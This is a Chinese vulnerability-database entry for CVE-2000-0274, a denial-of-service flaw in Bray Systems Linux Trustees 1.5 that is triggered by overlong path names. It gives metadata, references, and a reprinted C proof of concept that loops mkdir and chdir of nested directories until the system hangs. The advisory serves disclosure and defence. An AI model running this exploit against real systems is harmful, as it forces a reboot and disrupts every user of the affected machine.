Bray Systems 1.5 Linux Trustee超长路径名漏洞-安全小百科

Bray Systems 1.5 Linux Trustee超长路径名漏洞

漏洞ID	1105777	漏洞类型	边界条件错误
发布时间	2000-04-10	更新时间	2005-05-02
CVE编号	CVE-2000-0274	CNNVD-ID	CNNVD-200004-015
漏洞平台	Linux	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/19837
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-015

|漏洞详情

TheLinuxtrusteeskernel路径存在漏洞，攻击者可以通过使用超长名访问文件或目录来触发拒绝服务。

|漏洞EXP

source: http://www.securityfocus.com/bid/1096/info

Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine.

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}

|参考资料

来源:www.braysystems.com
链接:http://www.braysystems.com/linux/trustees.html
来源:BID
名称:1096
链接:http://www.securityfocus.com/bid/1096
来源:BUGTRAQ
名称:20000410linuxtrustees1.5longpathnamevulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-04/0035.html

相关推荐: Microsoft IIS缓冲区溢出漏洞

Microsoft IIS缓冲区溢出漏洞漏洞ID 1207185 漏洞类型缓冲区溢出发布时间 1999-01-24 更新时间 1999-01-24 CVE编号 CVE-1999-1544 CNNVD-ID CNNVD-199901-045 漏洞平台 N/…

文章版权归作者所有，未经允许请勿转载。

THE END